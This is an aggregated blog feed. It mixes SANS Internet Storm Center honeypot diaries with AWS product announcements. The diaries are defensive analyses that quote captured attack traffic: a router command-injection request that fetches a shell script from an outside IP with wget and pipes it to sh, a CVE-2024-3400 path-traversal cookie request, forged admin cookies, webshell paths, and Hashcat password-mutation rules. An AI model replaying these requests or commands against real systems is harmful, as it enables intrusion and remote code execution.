[Guest Diary] Comparing Honeypot Passwords with HIBP, (Wed, Oct 1st)

This post was originally published on this site

[This is a Guest Diary by Draden Barwick, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

DShield Honeypots are constantly exposed to the internet and inundated with exploit traffic, login attempts, and other malicious activity. Analyzing the logged password attempts can help identify what attackers are targeting. To go through these passwords, I have created a tool that leverages HaveIBeenPwned’s (HIBP’s) API to flag passwords that haven’t appeared in any breaches.

Purpose

Identifying passwords that haven't been seen in known breaches is useful because it can indicate additional planning by the attacker and help identify patterns in these less common passwords. Anyone who operates a honeypot (and receives a lot of data on attempted plaintext password use) could benefit from this project as an additional starting point for investigations.

Development

HaveIBeenPwned maintains a large database of breached passwords and offers an API that tells you whether a given password has been compromised. This is done by making a request to “https://api.pwnedpasswords.com/range/#####”, where the “#####” part is the first 5 characters (prefix) of the SHA1 hash of the tested password. The site returns a list of the last 35 characters (suffix) of every password hash in the database that starts with the provided prefix, and each entry includes a count of how many times the corresponding password has been seen in breaches. This prevents anyone from learning the full hash of the password we are looking for from the request alone. While this consideration is not important for our use with the DShield honeypots (as all passwords seen are publicly uploaded), it is important to understand because HIBP does not allow searching with the full hash directly [2].
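For illustration, here is a minimal Python sketch of a single range query. This is not the author's script, and the password shown is just an example (rate-limit and error handling are covered further below):

import hashlib
import urllib.request

password = "Password123"                     # example value only
sha1 = hashlib.sha1(password.encode()).hexdigest().upper()
prefix, suffix = sha1[:5], sha1[5:]

req = urllib.request.Request(
    "https://api.pwnedpasswords.com/range/" + prefix,
    headers={"User-Agent": "PasswordCheckingProject"},
)
with urllib.request.urlopen(req) as resp:
    body = resp.read().decode()

# Each response line is "<35-character suffix>:<breach count>"
count = 0
for line in body.splitlines():
    candidate, _, seen = line.partition(":")
    if candidate == suffix:
        count = int(seen)
        break

print(count if count else "not found in HIBP")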

To build a list of all the passwords my honeypot has collected, I used JQ to parse the cowrie.json files located in the /srv/cowrie/var/log/cowrie directory. This command matches any login failure or success events and returns the password field from matching entries:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* 

To extend this, we can remove duplicates using sort and uniq and save the unique passwords to a file:

jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

As of this writing, this reduced 51,601 password attempts to 16,210 unique passwords.

Now that we have a list of unique passwords, the next steps are to: read the created password file, take the SHA1 hash of each line, query the API for the hash prefix, and check for the hash suffix in the results.

To accomplish this, I created a Python script that utilizes one input file and two output files. The input file has a list of passwords to check with one entry per line. One output file stores all passwords that have been checked, the SHA1 hash, and how many times HIBP has seen the password (this file is a CSV used to avoid checking a password in the input file if it has been checked before). The other output file stores the plaintext of any password never seen by HIBP. The command line usage looks like this:

python3 queryHIBP.py uniquepass.txt passwordResults.csv unseenPasswords.txt

This resulted in the identification of 1,196 passwords that HIBP has not seen.

Code Breakdown

The code, available on GitHub [3], is thoroughly commented, but we will examine some parts here to gain a deeper understanding of how it functions.

In Figure 1, we can see the section of code that reads the results file containing all passwords we have already searched for. This file is expected to be a CSV with a header of “password,sha1,count”. As explained above, this helps avoid checking passwords unnecessarily.

The code opens the file with csv.DictReader, checks for “password” in the header, then uses a for loop to go through all of the rows to pull non-empty passwords and add them to a set. The set is returned at the end of the function.

 
Figure 1: Code used to read all previously checked passwords.
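As a rough sketch of the same idea (not the author's exact code), such a reader might look like this:

import csv

def load_checked_passwords(results_path):
    # Returns the set of passwords already recorded in the results CSV,
    # which is expected to have the header "password,sha1,count".
    checked = set()
    try:
        with open(results_path, newline="", encoding="utf-8") as f:
            reader = csv.DictReader(f)
            if not reader.fieldnames or "password" not in reader.fieldnames:
                return checked
            for row in reader:
                if row.get("password"):
                    checked.add(row["password"])
    except FileNotFoundError:
        pass  # first run: no results file yet
    return checked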

 

In Figure 2, we can see the code used to make API requests and handle a common error. First, a loop is established and the API request is made. Second, we check for a 429 response code, which means there were too many requests. If there was a 429 error, HIBP adds a “Retry-After” header that tells us how long to wait before trying again. The user agent is specified elsewhere as “PasswordCheckingProject” because HIBP states that “A missing user agent will result in an HTTP 403 response” [4].


Figure 2: Code used to make API requests and handle expected 429 errors.

 

Figure 3 shows the handling of additional errors as well as normal operation. First, “resp.raise_for_status()” is called, which raises an exception if there was an error with the HTTP request. If there is no error, we simply iterate through all lines of the response to save each hash suffix and count in a dictionary, then return it. If an exception is raised, we increment an “attempt” variable, which lets us cap the number of retries (three by default). If the maximum is hit, the code prints an error message indicating which prefix was being checked and exits. If retries remain, the script waits 5 seconds before continuing. Figure 2 has a similar check for max retries to avoid a potential infinite loop of 429 errors.


Figure 3: Code used to store & return request results or deal with continued/unexpected errors.
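Putting the behavior from Figures 2 and 3 together, a simplified version of the request logic could look like the sketch below. Variable names and details differ from the actual script on GitHub:

import sys
import time
import requests

MAX_RETRIES = 3
HEADERS = {"User-Agent": "PasswordCheckingProject"}  # HIBP returns 403 without a user agent

def query_range(prefix):
    # Query HIBP for a 5-character SHA1 prefix and return {suffix: count}.
    attempt = 0
    while True:
        resp = requests.get("https://api.pwnedpasswords.com/range/" + prefix,
                            headers=HEADERS, timeout=30)
        if resp.status_code == 429:
            # Too many requests: wait as instructed by the Retry-After header
            attempt += 1
            if attempt >= MAX_RETRIES:
                sys.exit("Giving up on prefix %s: repeated 429 responses" % prefix)
            retry_after = resp.headers.get("Retry-After", "5")
            time.sleep(int(retry_after) if retry_after.isdigit() else 5)
            continue
        try:
            resp.raise_for_status()
        except requests.RequestException:
            attempt += 1
            if attempt >= MAX_RETRIES:
                sys.exit("Giving up on prefix %s: request kept failing" % prefix)
            time.sleep(5)
            continue
        results = {}
        for line in resp.text.splitlines():
            suffix, _, count = line.partition(":")
            results[suffix] = int(count)
        return results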

 

Implementation

To download the project and try it out with some test data, one can run the following:

git clone https://github.com/MeepStryker/queryHIBP.git
cd queryHIBP
python3 queryHIBP.py ./sampleInput.txt ./passwordResults.csv ./unseenPasswords.txt

As the script runs, it will print out each unseen password identified and a short summary at the end as seen in Figure 4.


Figure 4: Script output using real data.

 

Automation

To automate the use of this tool, I created a cron job to run the JQ command & output results to a file and made another job to run the script with the needed arguments. These are set to run daily with the script running 5 minutes after the JQ command. This uses the following crontab entries:

0 17 * * * jq -r 'select(.eventid=="cowrie.login.failed" or .eventid=="cowrie.login.success") | [.password] | @tsv' /srv/cowrie/var/log/cowrie/cowrie.json* | sort | uniq > ~/uniquepass.txt

5 17 * * * python3 ~/queryHIBP.py ~/uniquepass.txt ~/passwordResults.csv ~/unseenPasswords.txt

The script runs 5 minutes after the JQ command to ensure there is more than enough time to create the input file. Since logs are only retained for a limited time, there is no concern that creating the input file will ever start taking longer than that.

I chose this method over adding parsing functionality to the script out of convenience. Doing the parsing in the script would require additional logic and either hardcoding locations to check for logs or dealing with more arguments. As designed, anyone can easily plug in a list of passwords without having to worry about many command line options or editing the script.

Results

The script accurately identifies passwords that HaveIBeenPwned has not seen in prior breaches. While there were more unseen passwords than one might expect (1,196, or ~7.4% of all unique passwords as of this writing), they provide interesting insight into what some actors may be targeting. The results also reveal patterns in the password mutations being leveraged for access attempts:

deploy12345
deploy123456
deploy1234567
deploy12345678
deploy@2022
deploy@2023
deploy@2025
deploy2025
deploy@321
deploypass
P@$$vords123
P@$sw0rd#
P4$$word!@#
P455wORd
P@55W0RD2004
Pa$$word2016!
pa33w0rd!@
Pa55w0rd@2021
passw0rd!@#$
pass@w0rd.12345
passwd@123!
PaSswORD@123
password@2!@
PaSswORd2021
password!2024
password!2025
Password43213
password!@#456

Password Patterns & Analysis

Analyzing the passwords seen in the above Results section can provide some insight into what techniques are being used to generate passwords.

Consider the above sample of results. Broadly speaking, this ‘deploy family’ of passwords was likely generated by starting with a base password of “deploy” and adding common modifiers to increase complexity. Seen here are good examples of the simplest ones: adding the year (with an @ sign in this case) and adding sequential numbers.

The rest of the entries above are all based on the word ‘password’. These are more complex than what we saw with ‘deploy’. Below are three entries, each with a plain explanation of a Hashcat rule that could produce it and a sample implementation of the rule (a short Python sketch after the list reproduces the same mutations):

  • P4$$word!@#
    • Capitalize the first letter, replace a’s with 4’s, replace s’s with $’s, add !@# to end – c sa4 ss$ $! $@ $#
  • P@55W0RD2004
    • Capitalize all letters, replace a’s with @’s, replace s’s with 5’s, replace o’s with 0’s, and add a year to the end – u sa@ ss5 so0 $2 $0 $0 $4
  • Password!2024
    • Capitalize the first letter, add ! and a year to the end – t0 $! $2 $0 $2 $4
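The three mutations above can be reproduced with plain string operations. Here is a minimal Python sketch, for illustration only; Hashcat applies the equivalent rules during an actual attack:

base = "password"

p1 = base.capitalize().replace("a", "4").replace("s", "$") + "!@#"                  # P4$$word!@#
p2 = base.upper().replace("A", "@").replace("S", "5").replace("O", "0") + "2004"    # P@55W0RD2004
p3 = base.capitalize() + "!2024"                                                    # Password!2024

assert (p1, p2, p3) == ("P4$$word!@#", "P@55W0RD2004", "Password!2024")
print(p1, p2, p3)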

Both Hashcat and John the Ripper can make these modifications by using rules to augment password lists. The rules allow various changes to the input, such as replacing or swapping certain characters with others. Note that while much of the rule syntax is similar between the two tools, there are some differences [5].

Looking through the unseen passwords, we can also see more specific targets such as Elasticsearch, Oracle, PostgreSQL, and Ubuntu. Figure 5 shows some of these passwords, which use the same kinds of modifications mentioned earlier, and illustrates the relative difference in frequency.


Figure 5: Passwords related to specific services/platforms.

Overall Takeaway

While a good amount of manual analysis will still be required, these results can provide a lot of value, and the script helps cut down on the time needed. We can learn more about common password modifications to avoid and even get an idea of the relative interest in different targets. In Figure 5 alone, we can see that PostgreSQL may be roughly twice as likely to be targeted as Elasticsearch, with newer installations being targeted in particular.

For future work, I would add a feature to recheck the known unseen passwords to identify if they happen to be newly breached.

Additionally, I may consider adding two features for convenience. The first would be re-sorting the unseen-password file, since it is currently append-only. The second would be parsing features to simplify automation and allow the script to provide more functionality for end users.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://haveibeenpwned.com/API/v3#PwnedPasswords
[3] https://github.com/MeepStryker/queryHIBP
[4] https://haveibeenpwned.com/API/v3#UserAgent
[5] https://hashcat.net/wiki/doku.php?id=rule_based_attack#compatibility_with_other_rule_engines

 


Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing Amazon ECS Managed Instances for containerized applications

This post was originally published on this site

Today, we’re announcing Amazon ECS Managed Instances, a new compute option for Amazon Elastic Container Service (Amazon ECS) that enables developers to use the full range of Amazon Elastic Compute Cloud (Amazon EC2) capabilities while offloading infrastructure management responsibilities to Amazon Web Services (AWS). This new offering combines the operational simplicity of offloading infrastructure with the flexibility and control of Amazon EC2, which means customers can focus on building applications that drive innovation, while reducing total cost of ownership (TCO) and maintaining AWS best practices.

Customers running containerized workloads told us they want to combine the simplicity of serverless with the flexibility of self-managed EC2 instances. Although serverless options provide an excellent general-purpose solution, some applications require specific compute capabilities, such as GPU acceleration, particular CPU architectures, or enhanced networking performance. Additionally, customers with existing Amazon EC2 capacity investments through EC2 pricing options couldn’t fully use these commitments with serverless offerings.

Amazon ECS Managed Instances provides a fully managed container compute environment that supports a broad range of EC2 instance types and deep integration with AWS services. By default, it automatically selects the most cost-optimized EC2 instances for your workloads, but you can specify particular instance attributes or types when needed. AWS handles all aspects of infrastructure management, including provisioning, scaling, security patching, and cost optimization, enabling you to concentrate on building and running your applications.

Let’s try it out

Looking at the AWS Management Console experience for creating a new Amazon ECS cluster, I can see the new option for using ECS Managed Instances. Let’s take a quick tour of all the new options.

Creating an ECS cluster with Managed Instances

After I’ve selected Fargate and Managed Instances, I’m presented with two options. If I select Use ECS default, Amazon ECS will choose general-purpose instance types by grouping pending tasks together and picking the optimal instance type based on cost and resilience metrics. This is the most straightforward and recommended way to get started. Selecting Use custom – advanced opens up additional configuration parameters, where I can fine-tune the attributes of the instances Amazon ECS will use.

Creating an ECS cluster with Managed Instances

By default, I see CPU and Memory as attributes, but I can select from 20 additional attributes to continue to filter the list of available instance types Amazon ECS can access.

Creating an ECS cluster with Managed Instances

After I’ve made my attribute selections, I see a list of all the instance types that match my choices.

Creating an ECS cluster with Managed Instances

From here, I can create my ECS cluster as usual, and Amazon ECS will provision instances on my behalf based on the attributes and criteria I’ve defined in the previous steps.

Key features of Amazon ECS Managed Instances

With Amazon ECS Managed Instances, AWS takes full responsibility for infrastructure management, handling all aspects of instance provisioning, scaling, and maintenance. This includes implementing regular security patches initiated every 14 days (due to instance connection draining, the actual lifetime of the instance may be longer), with the ability to schedule maintenance windows using Amazon EC2 event windows to minimize disruption to your applications.

The service provides exceptional flexibility in instance type selection. Although it automatically selects cost-optimized instance types by default, you maintain the power to specify desired instance attributes when your workloads require specific capabilities. This includes options for GPU acceleration, CPU architecture, and network performance requirements, giving you precise control over your compute environment.

To help optimize costs, Amazon ECS Managed Instances intelligently manages resource utilization by automatically placing multiple tasks on larger instances when appropriate. The service continually monitors and optimizes task placement, consolidating workloads onto fewer instances so that idle (empty) instances can be drained and terminated, providing both high availability and cost efficiency for your containerized applications.

Integration with existing AWS services is seamless, particularly with Amazon EC2 features such as EC2 pricing options. This deep integration means that you can maximize existing capacity investments while maintaining the operational simplicity of a fully managed service.

Security remains a top priority with Amazon ECS Managed Instances. The service runs on Bottlerocket, a purpose-built container operating system, and maintains your security posture through automated security patches and updates. You can see all the updates and patches applied to the Bottlerocket OS image on the Bottlerocket website. This comprehensive approach to security keeps your containerized applications running in a secure, maintained environment.

Available now

Amazon ECS Managed Instances is available today in US East (North Virginia), US West (Oregon), Europe (Dublin), Africa (Cape Town), Asia Pacific (Singapore), and Asia Pacific (Tokyo) AWS Regions. You can start using Managed Instances through the AWS Management Console, AWS Command Line Interface (AWS CLI), or infrastructure as code (IaC) tools such as AWS Cloud Development Kit (AWS CDK) and AWS CloudFormation. You pay for the EC2 instances you use plus a management fee for the service.

To learn more about Amazon ECS Managed Instances, visit the documentation and get started simplifying your container infrastructure today.

Announcing AWS Outposts third-party storage integration with Dell and HPE

This post was originally published on this site

Since announcing second-generation AWS Outposts racks in April with breakthrough performance and scalability, we’ve continued to innovate on behalf of our customers at the edge of the cloud. Today, we’re expanding the AWS Outposts third-party storage integration program to include Dell PowerStore and HPE Alletra Storage MP B10000 systems, joining our list of existing integrations with NetApp on-premises enterprise storage arrays and Pure Storage FlashArray. This program makes it easy for customers to use AWS Outposts with third-party storage arrays through AWS native tooling. The solution integration is particularly important for organizations migrating VMware workloads to AWS who need to maintain their existing storage infrastructure during the transition, and for those who must meet strict data residency requirements by keeping their data on-premises while using AWS services.

This announcement builds upon two significant storage integration milestones we achieved in the past year. In December 2024, we introduced the ability to attach block data volumes from third-party storage arrays to Amazon EC2 instances on Outposts directly through the AWS Management Console. Then in July 2025, we enabled booting Amazon EC2 instances directly from these external storage arrays. Now, with the addition of Dell and HPE, customers have even more choice in how they integrate their on-premises storage investments with AWS Outposts.

Enhanced storage integration capabilities

Our third-party storage integration supports both data and boot volumes, offering two boot methods: iSCSI SANboot and Localboot. The iSCSI SANboot option enables both read-only and read-write boot volumes, while Localboot supports read-only boot volumes using either iSCSI or NVMe-over-TCP protocols. With this comprehensive approach, customers can centrally manage their storage resources while maintaining the consistent hybrid experience that Outposts provides.

Through the Amazon EC2 Launch Instance Wizard in the AWS Management Console, customers can configure their instances to use external storage from any of our supported partners. For boot volumes, we provide AWS-verified AMIs for Windows Server 2022 and Red Hat Enterprise Linux 9, with automation scripts available through AWS Samples to simplify the setup process.

Support for various Outposts configurations

All third-party storage integration features are supported on Outposts 2U servers and both generations of Outposts racks. Support for second-generation Outposts racks means customers can combine the enhanced performance of our latest EC2 instances on Outposts—including twice the vCPU, memory, and network bandwidth—with their preferred storage solutions. The integration works seamlessly with both our new simplified network scaling capabilities and specialized Amazon EC2 instances designed for ultra-low latency and high throughput workloads.

Things to know

Customers can begin using these capabilities today with their existing Outposts deployments or when ordering new Outposts through the AWS Management Console. If you are using third-party storage integration with Outposts servers, you can have either your onsite personnel or a third-party IT provider install the servers for you. After the Outposts servers are connected to your network, AWS will remotely provision compute and storage resources so you can start launching applications. For Outposts rack deployments, the process involves a setup where AWS technicians verify site conditions and network connectivity before the rack installation and activation. Storage partners assist with the implementation of the third-party storage components.

Third-party storage integration for Outposts with all compatible storage vendors is available at no additional charge in all AWS Regions where Outposts is supported. See the FAQs for Outposts servers and Outposts racks for the latest list of supported Regions.

This expansion of our Outposts third-party storage integration program demonstrates our continued commitment to providing flexible, enterprise-grade hybrid cloud solutions, meeting customers where they are in their cloud migration journey. To learn more about this capability and our supported storage vendors, visit the AWS Outposts partner page and our technical documentation for Outposts servers, second-generation Outposts racks, and first-generation Outposts racks. To learn more about partner solutions, check out Dell PowerStore integration with AWS Outposts and HPE Alletra Storage MP B10000 integration with AWS Outposts.

"user=admin". Sometimes you don't even need to log in., (Tue, Sep 30th)

This post was originally published on this site

One of the common infosec jokes is that sometimes you do not need to "break into" an application; you just have to log in. This is often the case with weak default passwords, which are common in IoT devices. However, an even easier method is to simply tell the application who you are. This does not even require a password! One of the sad recurring vulnerabilities is an HTTP cookie that contains the user's username or user ID.

I took a quick look at our honeypot for cookies matching this pattern. Here is a selection:

Cookie: uid=1
Cookie: user=admin
Cookie: O3V2.0_user=admin
Cookie: admin_id=1; gw_admin_ticket=1
Cookie: RAS_Admin_UserInfo_UserName=admin
Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.
Cookie: admin_id=1; gw_admin_ticket=1;
Cookie: ASP.NET_SessionId=; sid=admin

These are listed by frequency, with "uid=1" being the most commonly used value.
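For anyone who wants to pull similar numbers from their own sensor, a rough sketch is shown below. The log location and field names are assumptions for illustration and will need to be adjusted to match your honeypot's actual web log format:

import glob
import json
from collections import Counter

counts = Counter()
for path in glob.glob("/srv/db/webhoneypot-*.json"):   # hypothetical log location
    with open(path, encoding="utf-8") as f:
        for line in f:
            try:
                entry = json.loads(line)
            except json.JSONDecodeError:
                continue
            cookie = (entry.get("headers") or {}).get("cookie", "")
            if "admin" in cookie.lower() or "uid=1" in cookie:
                counts[cookie] += 1

for cookie, n in counts.most_common(10):
    print("%6d  %s" % (n, cookie))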

Let's see if we can identify some of the targeted vulnerabilities.

For the first one (uid=1), the URL hit is:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<some shell command>

%%CVE:2024-3721%%: This is a relatively new (2024) OS command injection vulnerability in certain TBK DVRs.

The second one is also an IoT-style issue:

POST /goform/set_LimitClient_cfg
User-Agent: Mozilla/5.0 (makenoise@tutanota.de)
Content-Type: application/x-www-form-urlencoded
Content-Length: 113
Cookie: user=admin

time1=00:00-00:00&time2=00:00-00:00&mac=%3Bwget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.xqe.sh%7Csh%26echo%20

%%CVE:2023-26801%%: Another "classic" IoT issue. This one affects LB-LINK wireless routers. This vulnerability may never have been patched, but I'm unsure how popular these routers are.

The cookie "O3V2.0_user=admin" is associated with a similar, but more recent issue affecting Tenda O3V2 wireless access points. Wireless internet service providers (WISPs) often use these outdoor access points. The vulnerability is similar to the issue above in that a POST request to "/goform/setPingInfo" is used to carry an OS injection payload—the common URL schemes like "/goform" point to similar firmware and likely similar vulnerabilities.

" admin_id=1; gw_admin_ticket=1": Google returned a reference to a post in Chinese, implying that this is a vulnerability in "Qi'anxin VPN" and allows arbitrary account and password modification.

"RAS_Admin_UserInfo_UserName=admin" affects the "Comai RAS System" software for managing remote desktop environments. Most references to the vulnerability are in Chinese. I did not see a CVE number, but the vulnerability appears to be three years old.

"CMX_SAVED_ID=zero; CMX_ADMIN_ID=science": No CVE, and there is no fix for this issue, which was discovered in 2021. Only affects a biometric access system 🙁 (COMMAX. See https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php.

So in short: Yes… These vulnerabilities are out there, and they are exploited.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Apple Patches Single Vulnerability CVE-2025-43400, (Mon, Sep 29th)

This post was originally published on this site

It is typical for Apple to release a ".0.1" update soon after releasing a major new operating system. These updates typically fix various functional issues, but this time, they also fix a security vulnerability. The security vulnerability not only affects the "26" releases of iOS and macOS, but also older versions. Apple released fixes for iOS 18 and 26, as well as for macOS back to Sonoma (14). Apple also released updates for WatchOS and tvOS, but these updates do not address any security issues. For visionOS, updates were only released for visionOS 26.

Increase in Scans for Palo Alto Global Protect Vulnerability (CVE-2024-3400), (Mon, Sep 29th)

This post was originally published on this site

We are all aware of the abysmal state of security appliances, no matter their price tag. Every so often, we see an increase in attacks against some of these vulnerabilities, trying to mop up systems missed in earlier exploit waves. Currently, one source in particular, %%ip:141.98.82.26%%, is looking to exploit systems vulnerable to CVE-2024-3400. The exploit is rather straightforward. Palo Alto never considered it necessary to validate the session ID. Instead, they use the session ID "as is" to create a session file. The exploit is well explained by watchTowr [1].

First, we see a request to upload a file:

POST /ssl-vpn/hipreport.esp
Host: [honeypot ip]:8080
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Content-Length: 174
Content-Type: application/x-www-form-urlencoded
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/33EGKkp7zRbFyf06zCV4mzq1vDK.txt;
Accept-Encoding: gzip

user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global

Next, a request to retrieve the uploaded file:

GET /global-protect/portal/images/33KFpJLBHsMmkNuxs7pqpGOIIgF.txt
host: [honeypot ip]
user-agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
connection: close
accept-encoding: gzip

This will return a "403" error if the file exists, and a "404" error if the upload failed. The content of the file is a standard Global Protect session file and will not execute; this request alone does not lead to code execution. A follow-up attack would upload the file to a location that does lead to code execution.
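To look for the same pattern in your own logs, a quick filter along these lines may help. The one-JSON-object-per-line format and field names are assumptions for illustration; adjust them to whatever your proxy or honeypot records:

import json
import sys

for line in sys.stdin:
    try:
        entry = json.loads(line)
    except json.JSONDecodeError:
        continue
    cookie = (entry.get("headers") or {}).get("cookie", "")
    # Path traversal in the SESSID cookie is the telltale sign of this exploit
    if "SESSID=" in cookie and "../" in cookie:
        print(entry.get("url", "?"), cookie)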

The same source is also hitting the URL "/Synchronization" on our honeypots. Google AI associates this with a Global Protect vulnerability discovered last week, but this appears to be a hallucination.  

[1] https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: Amazon S3, Amazon Bedrock AgentCore, AWS X-Ray and more (September 29, 2025)

This post was originally published on this site

Wow, can you all believe it? We’re nearing the end of the year already. Next thing you know, AWS re:Invent will be here! This is our biggest event, taking place every year in Las Vegas from December 1st to December 5th, where we reveal and release many of the things that we’ve been working on. If you haven’t already, buy your tickets to AWS re:Invent 2025 to experience it in person. If you can’t make it to Vegas, don’t worry; make sure to stay tuned here on the AWS News Blog, where we will be covering many of the announcements as they happen.

However, there are plenty of exciting new releases between now and then, so, as usual, let’s take a quick look at some of the highlights from last week so you can catch up on what’s been recently launched, starting with one of the most popular services: Amazon S3!

S3 updates
The S3 team has been working really hard to make working with S3 even better. This month alone has seen releases such as bulk target selection for S3 Batch Operations, support for conditional deletes in S3 general purpose buckets, increased file size and archive scanning limits for malware protection, and more.

Last week was another S3 milestone with the addition of a preview in the AWS Console for Amazon S3 Tables. You can now take a quick peek at your S3 Tables right from the console, making it easier to understand their data structure and content without writing any SQL. This viewer-friendly feature is ready to use across all regions where S3 Tables are supported, with costs limited to just the S3 requests needed to display your table preview.

Other releases
Here are some highlights from other services which also released some great stuff this week.

Amazon Bedrock AgentCore expands enterprise integration and automation options — Bedrock AgentCore services are leveling up their enterprise readiness with new support for Amazon VPC connectivity, AWS PrivateLink, AWS CloudFormation, and resource tagging, giving developers more control over security and infrastructure automation. These enhancements let you deploy AI agents that can securely access private resources, automate infrastructure deployment, and maintain organized resource management whether you’re using AgentCore Runtime for scalable agent deployment, Browser for web interactions, or Code Interpreter for secure code execution.

AWS X-Ray brings smart sampling for better error detection — AWS X-Ray now offers adaptive sampling that automatically adjusts trace capture rates within your defined limits, helping DevOps teams and SREs catch critical issues without oversampling during normal operations. The new capability includes Sampling Boost for increased sampling during anomalies and Anomaly Span Capture for targeted error tracing, giving teams better observability exactly when they need it while keeping costs in check.

AWS Clean Rooms enhances real-time collaboration with incremental ID mapping — AWS Clean Rooms now lets you update ID mapping tables with only new, modified, or deleted records through AWS Entity Resolution, making data synchronization across collaborators more efficient and timely. This improvement helps measurement providers maintain fresh datasets with advertisers and publishers while preserving privacy controls, enabling always-on campaign measurement without the need to reprocess entire datasets.

Short and sweet
Here are some bite-sized updates that could prove really handy for your teams or workloads.

Keeping up with the latest EC2 instance types can be challenging. AWS Compute Optimizer now supports 99 additional instance types including the latest C8, M8, R8, and I8 families.

In competitive gaming, every millisecond counts! Amazon GameLift has launched a new Local Zone in Dallas bringing ultra-low latency game servers closer to players in Texas.

When managing large-scale Amazon EC2 deployments, control is everything! Amazon EC2 Allowed AMIs setting now supports filtering by marketplace codes, deprecation time, creation date, and naming patterns to help prevent the use of non-compliant images. Additionally, EC2 Auto Scaling now lets you force cancel instance refreshes immediately, giving you faster control during critical deployments.

Making customer service more intelligent and secure across languages! Amazon Connect introduces enhanced analytics in its flow designer for better customer journey insights, adds custom attributes for precise interaction tracking, and expands Contact Lens sensitive data redaction to support seven additional European and American languages.

That’s it for this week!

Don’t forget to check out all the upcoming AWS events happening across the globe. There are many exciting opportunities for you to attend free events where you can meet lots of people and learn a lot while enjoying a great day amongst other like-minded people in the tech industry.

And if you feel like competing for some cash, time is running out to be part of something extraordinary! The AWS AI Agent Global Hackathon continues until October 20, offering developers a unique opportunity to build innovative AI agents using AWS’s comprehensive gen AI stack. With over $45,000 in prizes and exclusive go-to-market opportunities up for grabs, don’t miss the chance to showcase your creativity and technical prowess in this global competition.

I hope you have found something useful or exciting within this last week’s launches. We post a weekly review every Monday to help you keep up with the latest from AWS so make sure to bookmark this and hopefully see you for the next one!

Matheus Guimaraes | @codingmatheus

New tool: convert-ts-bash-history.py, (Fri, Sep 26th)

This post was originally published on this site

In SANS FOR577 [1], we talk about timelines on day 5, both filesystem timelines and super-timelines. Sometimes, though, I want something quick and dirty, and rather than fire up Plaso just to create a timeline of .bash_history data, it is nice to be able to parse the files directly and, if timestamps are enabled, see them in a human-readable form. I've had some students in class write scripts to do this, and one even promised to share his with me after class, but I never ended up getting it, so I decided to write my own. This script takes the path to one or more .bash_history files and returns a PSV (pipe-separated values) list on stdout in the form <filename>|<datetime>|<command>, where <datetime> is in ISO 8601 format (the one true date-time format, but only to 1-second resolution, since that is the best the .bash_history file will give us). In a future version, I will probably offer an option to change from PSV to CSV.
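The general idea is simple: when HISTTIMEFORMAT is enabled, bash writes a comment line containing the epoch timestamp (e.g. "#1695900000") before each command. A rough sketch of that parsing logic (not the actual tool) looks like this:

import sys
from datetime import datetime, timezone

def convert(path):
    # Emit "<filename>|<ISO-8601 datetime>|<command>" for a timestamped .bash_history
    ts = ""
    with open(path, errors="replace") as f:
        for line in f:
            line = line.rstrip("\n")
            if line.startswith("#") and line[1:].isdigit():
                # the epoch recorded for the command that follows
                ts = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc).isoformat()
            elif line:
                print("%s|%s|%s" % (path, ts, line))

if __name__ == "__main__":
    for p in sys.argv[1:]:
        convert(p)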

Webshells Hiding in .well-known Places, (Thu, Sep 25th)

This post was originally published on this site

Every so often, I see requests for files in .well-known recorded by our honeypots. As an example:

GET /.well-known/xin1.php?p
Host: [honeypot host name]

The file names indicate that they are likely looking for webshells. In my opinion, the reason they are looking in .well-known is that this makes a decent place to hide webshells without having them overwritten by an update to the site.

The .well-known directory is meant to be used for various informational files [1], for example, ACME TLS challenges. As a result, it is the only directory or file starting with "." that must be accessible via the web server. But it is also "hidden" from Unix command-line users. I have written about the various legitimate uses of .well-known before [2].

We also see some requests for PHP files in the acme-challenge subdirectory, as well as the pki-validation subdirectory.

Here are some of the more common, but not "standard" URLs in .well-known hit in our honeypots:

/.well-known/pki-validation/about.php
/.well-known/about.php
/.well-known/acme-challenge/cloud.php
/.well-known/acme-challenge/about.php
/.well-known/pki-validation/xmrlpc.php
/.well-known/acme-challenge/index.php
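For web server operators, a quick way to spot anything suspicious of this kind is to sweep the document root for PHP files under .well-known. A small sketch (the docroot path is just an example, adjust for your server):

import os

DOCROOT = "/var/www"   # example path

for dirpath, _, filenames in os.walk(DOCROOT):
    # Only look inside .well-known directories
    if ".well-known" not in dirpath.split(os.sep):
        continue
    for name in filenames:
        if name.endswith(".php"):
            print(os.path.join(dirpath, name))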

 

 

[1] https://datatracker.ietf.org/doc/html/rfc8615
[2] https://isc.sans.edu/diary/26564

 —
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

